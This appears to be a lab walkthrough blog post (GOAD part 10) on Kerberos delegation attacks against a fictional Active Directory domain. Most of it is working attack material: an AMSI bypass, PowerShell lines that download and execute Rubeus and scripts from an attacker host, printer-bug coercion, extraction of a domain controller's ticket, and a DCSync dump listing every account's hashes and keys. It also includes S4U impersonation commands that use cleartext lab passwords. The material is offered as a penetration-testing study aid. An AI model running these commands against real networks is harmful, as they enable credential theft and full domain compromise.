GOAD – part 10 – Delegations
Now let’s try some delegation attacks. Here i will just demonstrate the exploitation, if you want to understand the delegation concept and go further you should read the following articles which are really awesome :
- hackndo :
- harmj0y:
- Elad Shamir :
Delegations
- There is three type of delegation in active directory:
- Unconstrained delegation
- Constrained delegation
- Resource based delegation
- In this blog post we will exploit the three of them.
Unconstrained delegation
- One way to find unconstrained delegation is to look in bloodhound :
MATCH (c {unconstraineddelegation:true}) return c
|
By default on windows active directory all domain controller are setup with unconstrained delegation
If you want to search for unconstrained delegation system (out of domain controller) :
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2
|
- In the windows GUI it look like this :
.
Exploit
- To exploit an unconstrained delegation the simplest way is to do that from windows with Rubeus.
- We launch an RDP connection on Winterfell.
xfreerdp /d:north.sevenkingdoms.local /u:eddard.stark /p:'FightP3aceAndHonor!' /v:192.168.56.11 /cert-ignore
|
On the previous step we already own the north domain, let’s say we got eddard password.
Eddard’s password came in cleartext when you run donPapi on Winterfell because there is a schedule task on this user
- From there we will bypass AMSI and launch Rubeus in memory (just like in part8)
Off course we could stop the defender anti-virus on the server, but on a real Pentest you didn’t want to do that on your customer servers.
- Prepare our server containing Rubeus.exe and our AMSI bypass.
python3 -m http.server 8080
|
- On the RDP session bypass AMSI :
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344) (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsi_rmouse.txt')|IEX |
.
Above not working in 2026 , i used below for the AMSI bypass
PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsibypass2026.txt')|IEX
PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsi_rmouse.txt')|IEX
PS C:\Windows\system32> $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe')
PS C:\Windows\system32> $assem = [System.Reflection.Assembly]::Load($data);
PS C:\Windows\system32> [Rubeus.Program]::MainString("triage");
...
.
- Now launch Rubeus in memory with execute assembly.
- First we will list the available tickets :
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe') $assem = [System.Reflection.Assembly]::Load($data); [Rubeus.Program]::MainString("triage"); |
- And now force a coerce of the DC kingslanding to the DC winterfell.
.
i used printerbug [ ms-rprn.exe \\kingslanding \\winterfell ] to force coerce
c:\tmp>ms-rprn.exe Usage: ms-rprn.exe \\targetserver \\CaptureServer c:\tmp>hostname winterfell c:\tmp>ms-rprn.exe \\kingslanding \\winterfell Attempted printer notification and received an invalid handle. The coerced authentication probably worked! c:\tmp>ms-rprn.exe \\kingslanding \\winterfell Attempted printer notification and received an invalid handle. The coerced authentication probably worked! c:\tmp>
.
python3 coercer.py -u arya.stark -d north.sevenkingdoms.local -p Needle -t kingslanding.sevenkingdoms.local -l winterfell |
- We look on the triage again :
[Rubeus.Program]::MainString("triage") |
- And now the tgt of kingslanding is present
- To extract it (relaunch coercer and 1 sec later launch the following dump command): (i don’t know why but the rubeus monitor mode doesn’t want to run in execute assembly)
[Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");
|
.
PS C:\Windows\system32> (new-object system.net.webclient).downloadstring('http://192.168.56.1/amsibypass2026.txt')|IEX
PS C:\Windows\system32> $data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/Rubeus.exe')
PS C:\Windows\system32> $assem = [System.Reflection.Assembly]::Load($data);
PS C:\Windows\system32> [Rubeus.Program]::MainString("triage");
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x625896
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
| 0x1061204 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x105c7ee | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x19c006 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | GC/winterfell.north.sevenkingdoms.local/sevenkingdoms.local | 4/23/2026 3:17:30 PM |
| 0xbae02 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | LDAP/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local | 4/23/2026 3:17:30 PM |
| 0xbadc5 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/23/2026 3:17:30 PM |
| 0x3546a | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | LDAP/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local | 4/23/2026 3:17:30 PM |
| 0x3e4 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | krbtgt/NORTH.SEVENKINGDOMS.LOCAL | 4/23/2026 3:27:14 PM |
| 0x3e4 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local | 4/24/2026 1:12:13 AM |
| 0x3e4 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/24/2026 1:12:13 AM |
| 0x3e4 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | DNS/winterfell.north.sevenkingdoms.local | 4/23/2026 3:27:14 PM |
| 0x1af7e36 | KINGSLANDING$ @ SEVENKINGDOMS.LOCAL | E3514235-4B06-11D1-AB04-00C04FC2DCD2/ec766ab6-b591-43d8-b0eb-11b676c95388/north.sevenkingdoms.local | 4/24/2026 12:09:28 AM |
| 0x1061429 | WINTERFELL$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x625896 | eddard.stark @ NORTH.SEVENKINGDOMS.LOCAL | krbtgt/NORTH.SEVENKINGDOMS.LOCAL | 4/24/2026 3:19:36 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | krbtgt/SEVENKINGDOMS.LOCAL | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | cifs/kingslanding.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | LDAP/WINTERFELL | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | E3514235-4B06-11D1-AB04-00C04FC2DCD2/aa41aee0-dc0d-4032-a00f-000674c83732/sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/kingslanding.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | cifs/WINTERFELL | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | cifs/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | WINTERFELL$ | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | ldap/winterfell.north.sevenkingdoms.local/north.sevenkingdoms.local | 4/24/2026 12:47:53 AM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | GC/winterfell.north.sevenkingdoms.local/sevenkingdoms.local | 4/23/2026 3:17:30 PM |
| 0x3e7 | winterfell$ @ NORTH.SEVENKINGDOMS.LOCAL | cifs/winterfell.north.sevenkingdoms.local | 4/23/2026 3:17:30 PM |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
PS C:\Windows\system32> [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
[*] Target user : kingslanding$
[*] Current LUID : 0x625896
PS C:\Windows\system32> [Rubeus.Program]::MainString("dump /user:kingslanding$ /service:krbtgt /nowrap");
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Action: Dump Kerberos Ticket Data (All Users)
[*] Target service : krbtgt
[*] Target user : kingslanding$
[*] Current LUID : 0x625896
UserName : KINGSLANDING$
Domain : SEVENKINGDOMS
LogonId : 0x1d3c813
UserSID : S-1-5-21-3008081783-3975149589-1763115855-1001
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 4/24/2026 1:23:29 AM
LogonServer :
LogonServerDNSDomain : SEVENKINGDOMS.LOCAL
UserPrincipalName :
ServiceName : krbtgt/SEVENKINGDOMS.LOCAL
ServiceRealm : SEVENKINGDOMS.LOCAL
UserName : KINGSLANDING$ (NT_PRINCIPAL)
UserRealm : SEVENKINGDOMS.LOCAL
StartTime : 4/23/2026 11:40:45 PM
EndTime : 4/24/2026 9:40:45 AM
RenewTill : 4/30/2026 11:40:45 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : i5RHTYnqmLavDM67pQhGgcDoTM6p+qs0bJOKXvL9SLg=
Base64EncodedTicket :
doIFrzCCBaugAwIBBaEDAgEWooIEmTCCBJVhggSRMIIEjaADAgEFoRUbE1NFVkVOS0lOR0RPTVMuTE9DQUyiKDAmoAMCAQKhHzAd
GwZrcmJ0Z3QbE1NFVkVOS0lOR0RPTVMuTE9DQUyjggRDMIIEP6ADAgESoQMCAQKiggQxBIIELU45xh9gz5jETGxZBrZtmEp3T8lh
qbmjtYbWjAYIVvX6D29cfC6Gg9hqnR4BgAUUfNR9FeYStJzjZFQ4lACPSzerA+NeXNPowXL4hyJCQWG/iyqeY5srvSrzAXPwcK5h
p1Zb8Efxt8DEMiXZIO9HuUSjFS6ILc7N9siCwf6AkX5WP6U8kfvn9dh5UHAI4xkYanIWYzMT0myyDz/6lFo9styIiFsHNBcXmtjB
KkLybdu0nXLqusdTShJetlg6L0ky9V0qSpigPxI646t/Vz63FHcbwiWMFZGqTCW++OTpDvr3BlC2Ox98en+/ylreGdtuaB7XPoCX
buSWA/j+RYTeXh+3i9oWntAbFgvsBQCj/PDwrah4jMprenkmS65e5YQdaI9GkmlMIm5B7SKK3Mm75HeBmbCTy9x9VcZuEhR7R+yM
OTb+dzHxX9ZI98+bWYUpgewrJxbvPGfuiaqK8i/4402MWxHh2uTnRtr11hpR0vIKUmSVmKn1LJT/lgw45aSm28WaQkGpGiYYXbdT
+0mYKYrRlWjnI2njJfREM/qXvrF3+SHHKIRhxR3Tv2zPVYJDrmjghkN7HowiuP2nLZ8rvPB+8wTH5XiF1dWIRXGMyJa9SmGQL9zV
PQZR1a3ZVo5mowwnJHhwyq9kfgtnt7lFWqGkSNTZs10Il5yWon76eKKFHYVv3JQ7DfJ4Wu/UeVMVV2LcqMBQa8p2xbBxiHq1MSLv
0DhjjCr0HgvLtHQoN+GMhXs/4xOtA0Qat35yvZXH9vkvT4digDS8XPYLmAaoPHCwQNqM64bLWl4nY7lAq52TNAoGb3XR2sjHm5lP
SHIeFIsVhSz1Nmxj85jcgWNfR986fCHuKB6423jyIujt+kSqb56fivX0ZAuPtfr4Z+7lNEVlp3grvtucqqFDWZ+BdHs+uRpTytCf
Z4M1Cz7C22eXv7QvVUgHY1co8mlqrK44WxxCtriu5iGYX+nmNbwnSdqBOCkfHMTXX5RfRn/dZQ5+poRaHTabssKN4L7Gsk3jAB9U
knRGGc3OIrVJ2vxuKlSTpwdTe4FIpNNKIHPrnB/DIKJ/4w15ql0IF+wveI+06UnSjhdcQsKCKnSMRpN+IaKqZkLMLt3lJNS0mw0b
I2ydzSzAfwAONLGNdH+yqf3x/Loa99GCBUq4PrrNrtQVr2OW0VkQHqMUabWvHhp0ZqTCEfgWnKQXrqFNAzy2q2eoBeG5N5CbVugo
d3KjXGOBZ33zfZoz4miwuwwpGwy8W+y4q12nxQPeQh3h3Wl4djVfjoIHf/L0lnabl0JA28y7e3kKiqky//BUCReqAmtfS08TCCpu
1lvZtwOF5F3WrhBbkBpYrBpz+x4C4Mg40c8aX2kQ8QDILuJaTh1KC4AL0BqrOjtpQY8SAohZgPHEFLhYYXEw6cG16DN9G1S+8wSj
ggEAMIH9oAMCAQCigfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgi5RHTYnqmLavDM67pQhGgcDoTM6p+qs0bJOKXvL9
SLihFRsTU0VWRU5LSU5HRE9NUy5MT0NBTKIaMBigAwIBAaERMA8bDUtJTkdTTEFORElORySjBwMFAGChAAClERgPMjAyNjA0MjQw
NjQwNDVaphEYDzIwMjYwNDI0MTY0MDQ1WqcRGA8yMDI2MDUwMTA2NDA0NVqoFRsTU0VWRU5LSU5HRE9NUy5MT0NBTKkoMCagAwIB
AqEfMB0bBmtyYnRndBsTU0VWRU5LSU5HRE9NUy5MT0NBTA==
PS C:\Windows\system32>
.
- We now have the TGT of the domain controller
- Let’s continue on linux to pass the ticket and launch dcsync with secretdump :
- copy the ticket without space and return line (in vim i do :
:%s/\s*\n\s*//g) - convert the ticket to ccache
- use the kerberos ticket and launch secretdump
- copy the ticket without space and return line (in vim i do :
cat tgt.b64|base64 -d > ticket.kirbi ticketConverter.py ticket.kirbi ticket.ccache export KRB5CCNAME=/workspace/unconstrained/ticket.ccache secretsdump.py -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING |
.
.
┌──(bolke㉿kali)-[~/htb]
└─$ cat tgt.b64
doIFrzCCBaugAwIBBaEDAgEWooIEmTCCBJVhggSRMIIEjaADAgEFoRUbE1NFVkVOS0lOR0RPTVMuTE9DQUyiKDAmoAMCAQKhHzAdGwZrcmJ0Z3QbE1NFVkVOS0lOR0RPTVMuTE9DQUyjggRDMIIEP6ADAgESoQMCAQKiggQxBIIELU45xh9gz5jETGxZBrZtmEp3T8lhqbmjtYbWjAYIVvX6D29cfC6Gg9hqnR4BgAUUfNR9FeYStJzjZFQ4lACPSzerA+NeXNPowXL4hyJCQWG/iyqeY5srvSrzAXPwcK5hp1Zb8Efxt8DEMiXZIO9HuUSjFS6ILc7N9siCwf6AkX5WP6U8kfvn9dh5UHAI4xkYanIWYzMT0myyDz/6lFo9styIiFsHNBcXmtjBKkLybdu0nXLqusdTShJetlg6L0ky9V0qSpigPxI646t/Vz63FHcbwiWMFZGqTCW++OTpDvr3BlC2Ox98en+/ylreGdtuaB7XPoCXbuSWA/j+RYTeXh+3i9oWntAbFgvsBQCj/PDwrah4jMprenkmS65e5YQdaI9GkmlMIm5B7SKK3Mm75HeBmbCTy9x9VcZuEhR7R+yMOTb+dzHxX9ZI98+bWYUpgewrJxbvPGfuiaqK8i/4402MWxHh2uTnRtr11hpR0vIKUmSVmKn1LJT/lgw45aSm28WaQkGpGiYYXbdT+0mYKYrRlWjnI2njJfREM/qXvrF3+SHHKIRhxR3Tv2zPVYJDrmjghkN7HowiuP2nLZ8rvPB+8wTH5XiF1dWIRXGMyJa9SmGQL9zVPQZR1a3ZVo5mowwnJHhwyq9kfgtnt7lFWqGkSNTZs10Il5yWon76eKKFHYVv3JQ7DfJ4Wu/UeVMVV2LcqMBQa8p2xbBxiHq1MSLv0DhjjCr0HgvLtHQoN+GMhXs/4xOtA0Qat35yvZXH9vkvT4digDS8XPYLmAaoPHCwQNqM64bLWl4nY7lAq52TNAoGb3XR2sjHm5lPSHIeFIsVhSz1Nmxj85jcgWNfR986fCHuKB6423jyIujt+kSqb56fivX0ZAuPtfr4Z+7lNEVlp3grvtucqqFDWZ+BdHs+uRpTytCfZ4M1Cz7C22eXv7QvVUgHY1co8mlqrK44WxxCtriu5iGYX+nmNbwnSdqBOCkfHMTXX5RfRn/dZQ5+poRaHTabssKN4L7Gsk3jAB9UknRGGc3OIrVJ2vxuKlSTpwdTe4FIpNNKIHPrnB/DIKJ/4w15ql0IF+wveI+06UnSjhdcQsKCKnSMRpN+IaKqZkLMLt3lJNS0mw0bI2ydzSzAfwAONLGNdH+yqf3x/Loa99GCBUq4PrrNrtQVr2OW0VkQHqMUabWvHhp0ZqTCEfgWnKQXrqFNAzy2q2eoBeG5N5CbVugod3KjXGOBZ33zfZoz4miwuwwpGwy8W+y4q12nxQPeQh3h3Wl4djVfjoIHf/L0lnabl0JA28y7e3kKiqky//BUCReqAmtfS08TCCpu1lvZtwOF5F3WrhBbkBpYrBpz+x4C4Mg40c8aX2kQ8QDILuJaTh1KC4AL0BqrOjtpQY8SAohZgPHEFLhYYXEw6cG16DN9G1S+8wSjggEAMIH9oAMCAQCigfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgi5RHTYnqmLavDM67pQhGgcDoTM6p+qs0bJOKXvL9SLihFRsTU0VWRU5LSU5HRE9NUy5MT0NBTKIaMBigAwIBAaERMA8bDUtJTkdTTEFORElORySjBwMFAGChAAClERgPMjAyNjA0MjQwNjQwNDVaphEYDzIwMjYwNDI0MTY0MDQ1WqcRGA8yMDI2MDUwMTA2NDA0NVqoFRsTU0VWRU5LSU5HRE9NUy5MT0NBTKkoMCagAwIBAqEfMB0bBmtyYnRndBsTU0VWRU5LSU5HRE9NUy5MT0NBTA==
┌──(bolke㉿kali)-[~/htb]
└─$ cat tgt.b64|base64 -d > ticket.kirbi
┌──(bolke㉿kali)-[~/htb]
└─$ cat ticket.kirbi
v��0�������0��a��0����EVENKINGDOMS.LOCAL�(0&�� 0
rbtgtEVENKINGDOMS.LOCAL��C0�?���<snip>
INGSLANDING$�`��20260424064045Z�20260424164045Z�20260501064045Z�EVENKINGDOMS.LOCAL�(0&�� 0
rbtgtEVENKINGDOMS.LOCAL
┌──(bolke㉿kali)-[~/htb]
└─$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
┌──(bolke㉿kali)-[~/htb]
└─$ export KRB5CCNAME=ticket.ccache
┌──(bolke㉿kali)-[~/htb]
└─$ klist
Ticket cache: FILE:ticket.ccache
Default principal: KINGSLANDING$@SEVENKINGDOMS.LOCAL
Valid starting Expires Service principal
04/24/2026 08:40:45 04/24/2026 18:40:45 krbtgt/SEVENKINGDOMS.LOCAL@SEVENKINGDOMS.LOCAL
renew until 05/01/2026 08:40:45
┌──(bolke㉿kali)-[~/htb]
└─$ impacket-secretsdump -k -no-pass SEVENKINGDOMS.LOCAL/'KINGSLANDING$'@KINGSLANDING
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8df8b4dced5217c568a6f03c0593fe8f:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
tywin.lannister:1113:aad3b435b51404eeaad3b435b51404ee:af52e9ec3471788111a6308abff2e9b7:::
jaime.lannister:1114:aad3b435b51404eeaad3b435b51404ee:12e3795b7dedb3bb741f2e2869616080:::
cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b:::
tyron.lannister:1116:aad3b435b51404eeaad3b435b51404ee:b3b3717f7d51b37fb325f7e7d048e998:::
robert.baratheon:1117:aad3b435b51404eeaad3b435b51404ee:9029cf007326107eb1c519c84ea60dbe:::
joffrey.baratheon:1118:aad3b435b51404eeaad3b435b51404ee:3b60abbc25770511334b3829866b08f1:::
renly.baratheon:1119:aad3b435b51404eeaad3b435b51404ee:1e9ed4fc99088768eed631acfcd49bce:::
stannis.baratheon:1120:aad3b435b51404eeaad3b435b51404ee:d75b9fdf23c0d9a6549cff9ed6e489cd:::
petyer.baelish:1121:aad3b435b51404eeaad3b435b51404ee:6c439acfa121a821552568b086c8d210:::
lord.varys:1122:aad3b435b51404eeaad3b435b51404ee:52ff2a79823d81d6a3f4f8261d7acc59:::
maester.pycelle:1123:aad3b435b51404eeaad3b435b51404ee:9a2a96fa3ba6564e755e8d455c007952:::
KINGSLANDING$:1001:aad3b435b51404eeaad3b435b51404ee:5fa0743ba940d5ec51722df98e633919:::
NORTH$:1104:aad3b435b51404eeaad3b435b51404ee:8e25c0242ee688b2cc2e7a8129ff3e30:::
ESSOS$:1105:aad3b435b51404eeaad3b435b51404ee:70d73f33c4f4010a624ba5b96110e76d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:bdb1a615bc9d82d2ab21f09f11baaef4bc66c48efdd56424e1206e581e4dd827
Administrator:aes128-cts-hmac-sha1-96:0c72a36a70f696fbee13a25fd3412d43
Administrator:des-cbc-md5:7f2cd0836164e592
krbtgt:aes256-cts-hmac-sha1-96:89a9d4868c5eb0c5bd88e2fbeb66d7a1dd9af402bffa59b8501f5411135eb4bd
krbtgt:aes128-cts-hmac-sha1-96:ba984fef58f8f72155121352fb8ad997
krbtgt:des-cbc-md5:e6c8c8b51ab0914a
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
tywin.lannister:aes256-cts-hmac-sha1-96:6d700f4ade8a38d18bdd4f149aab963dfd0dce88a66240abdbdcb9044677fb80
tywin.lannister:aes128-cts-hmac-sha1-96:e813c0778e005572a1bef0c1a5337b76
tywin.lannister:des-cbc-md5:8f2594dada98862a
jaime.lannister:aes256-cts-hmac-sha1-96:1ed5f614b71e193bba93dc07e14c1c445a27ff1a6b0f265e98b45b10f6940ba7
jaime.lannister:aes128-cts-hmac-sha1-96:d7befe9d0dbb7a6d925156d5642ba57f
jaime.lannister:des-cbc-md5:ec51389dd6b67076
cersei.lannister:aes256-cts-hmac-sha1-96:0cbbc101644c0d73d9155b71172c811d41a3a640fea655b1fd6d6a22fd53ca59
cersei.lannister:aes128-cts-hmac-sha1-96:9c22476a9d1c88b472a7567a4380e502
cersei.lannister:des-cbc-md5:10c7a8a2b3643468
tyron.lannister:aes256-cts-hmac-sha1-96:ee2568536d09581b7b5e30b707e58d27e2cf5ee7acfc90dce4de852e44c5633c
tyron.lannister:aes128-cts-hmac-sha1-96:9b7f0a412e6219a1b48b8fb12ff2d499
tyron.lannister:des-cbc-md5:013d7091a470c719
robert.baratheon:aes256-cts-hmac-sha1-96:6b5468ea3a7f5cac5e2f580ba6ab975ce452833e9215fa002ea8405f88e5294d
robert.baratheon:aes128-cts-hmac-sha1-96:4f12248736038b239853bcf1d4abad94
robert.baratheon:des-cbc-md5:49762afd1f38abf1
joffrey.baratheon:aes256-cts-hmac-sha1-96:a008819500909ab61b76564b0d81cf4f7cb1bd7f213206e25df681f92792aa8c
joffrey.baratheon:aes128-cts-hmac-sha1-96:504c606625e04cd3b61107b8a29fdd4d
joffrey.baratheon:des-cbc-md5:fbc262e5efa1160e
renly.baratheon:aes256-cts-hmac-sha1-96:9a71ce0dcb412d20641d5075513644255f08b2a9767b5e79f487e5103cc55385
renly.baratheon:aes128-cts-hmac-sha1-96:ed5fe1af8432bcc33921aa1ac4d8c071
renly.baratheon:des-cbc-md5:519b98239223cb07
stannis.baratheon:aes256-cts-hmac-sha1-96:01c636e600ae2cfb05695b13ff1e906662941de94323233580f369f16e2b295a
stannis.baratheon:aes128-cts-hmac-sha1-96:c6224aebad6b49e083bc70d99f02f612
stannis.baratheon:des-cbc-md5:370d626ea886aefe
petyer.baelish:aes256-cts-hmac-sha1-96:6e0ef6e1793e4ac90dc1afa073ddfd46fc117308d0f0b4cae68dd370cf7439c3
petyer.baelish:aes128-cts-hmac-sha1-96:6fcbd3ff8b3111772644a8d0912ac744
petyer.baelish:des-cbc-md5:73a867cbe910a78a
lord.varys:aes256-cts-hmac-sha1-96:50ab31c625a3544d17d0dd20ae6f3d1c195c846faca9ce187073fd886d2d8206
lord.varys:aes128-cts-hmac-sha1-96:a4607553a99e2ff4fa1bcb98b0020661
lord.varys:des-cbc-md5:349173d05e6d9bc1
maester.pycelle:aes256-cts-hmac-sha1-96:25370ba431b262bdf7ca279e88d824cd59b4ce280bbef537a96fe51c8d790042
maester.pycelle:aes128-cts-hmac-sha1-96:7d375f265062643302a4827719ea541d
maester.pycelle:des-cbc-md5:89379167f87f0b5b
KINGSLANDING$:aes256-cts-hmac-sha1-96:7a559e7cbd32acc46369e7a8aa6cda3745fbababac6951fecc8c7059e1bc4282
KINGSLANDING$:aes128-cts-hmac-sha1-96:0783f4614228e83c2adf333ef0359a6e
KINGSLANDING$:des-cbc-md5:b34c38fde0540131
NORTH$:aes256-cts-hmac-sha1-96:fde9c94d6c5c9b248d328c45c5ca21d8705a94f67f5687f94a508971c5989f0f
NORTH$:aes128-cts-hmac-sha1-96:805b392914b35573ec3453db74511288
NORTH$:des-cbc-md5:df897913077ac41c
ESSOS$:aes256-cts-hmac-sha1-96:48430477b521a8bcc1adbbc05dcbbfaa525de78cb4d0b238113ab799ea4dbb03
ESSOS$:aes128-cts-hmac-sha1-96:5252d1c77e0f13052edd4ae0c5e6432c
ESSOS$:des-cbc-md5:6e94cd01ba673b1a
[*] Cleaning up...
.
Another way of exploitation, is to do a ptt with Rubeus and launch a dcsync with Mimikatz but this implies to run Mimikatz on Winterfell and bypass the defender AV
Unless you didn’t notice, the unconstrained delegation abuse was here exploited to pass from the child to the parent domain 😉
.
Constrained Delegation
- Find constrained delegation with bloodhound :
MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p |
Remark : sharphound seems to not capture the constrained delegation without protocol transition in the lab
- Find all the constrained delegation with impacket :
findDelegation.py NORTH.SEVENKINGDOMS.LOCAL/arya.stark:Needle -target-domain north.sevenkingdoms.local
|
With protocol transition
- To abuse the constrained delegation with protocol transition, the concept is to first ask a TGT for the user and execute S4U2Self followed by a S4U2Proxy to impersonate an admin user to the SPN on the target.
- From windows with Rubeus:
.\Rubeus.exe asktgt /user:jon.snow /domain:north.sevenkingdoms.local /rc4:B8D76E56E9DAC90539AFF05E3CCB1755 .\Rubeus.exe s4u /ticket:put_the__previous_ticket_here /impersonateuser:administrator /msdsspn:CIFS/winterfell /ptt |
- From linux with impacket:
getST.py -spn 'CIFS/winterfell' -impersonate Administrator -dc-ip '192.168.56.11' 'north.sevenkingdoms.local/jon.snow:iknownothing' |
- And next we can use the TGS to connect to smb and get a shell with psexec, smbexec, wmiexec, …
A good thing to know is that the SPN part is not encrypted in the request, so you can change it to the one you want with the following options :
- on rubeus : /altservice
- on impacket : -altservice
SPN lists Carlos Polop (hacktricks), give a us a useful list of the common SPN and usage on his silver ticket page
Without protocol transition
- The constrained delegation with protocol transition was not present originally in the lab, but you can add it with the following commands :
sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook vulnerabilities.yml -l dc02 --tags "data,constrained_delegation_kerb" |
- Or you could add it by hand with the powershell commands :
Set-ADComputer -Identity "castelblack$" -ServicePrincipalNames @{Add='HTTP/winterfell.north.sevenkingdoms.local'} Set-ADComputer -Identity "castelblack$" -Add @{'msDS-AllowedToDelegateTo'=@('HTTP/winterfell.north.sevenkingdoms.local','HTTP/winterfell')} |
- This result to this in the windows GUI :
- A good example of exploitation can be found here: https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html
The self-RBCD trick doesn’t work anymore. When i was writing this article i tried the self-rbcd without success many times. After multiple tries and fail i ask to charlie (@_nwodtuhs) what i am doing wrong, because i can’t find out why this don’t work as expected. He explained to me that the self rbcd trick didn’t work anymore and have been silent patch by Microsoft :’(
- To exploit the constrained delegation here we only need a forwardable TGS as administrator to any service on castelblack
- But if we do a s4u (s4u2self + s4u2proxy) like we did with protocol transition, the s4uself will send us a not forwardable TGS and the attack will fail.
- So to exploit and get the forwardable TGS we need, we first need to add a computer and use RBCD between the created computer (rbcd_const$) and the computer who have delegation set (here castelblack$).
- By doing that, you can do a s4u2self followed by a s4u2proxy on the added computer and the result is a forwardable tgs on hots/castelblack$ as administrator.
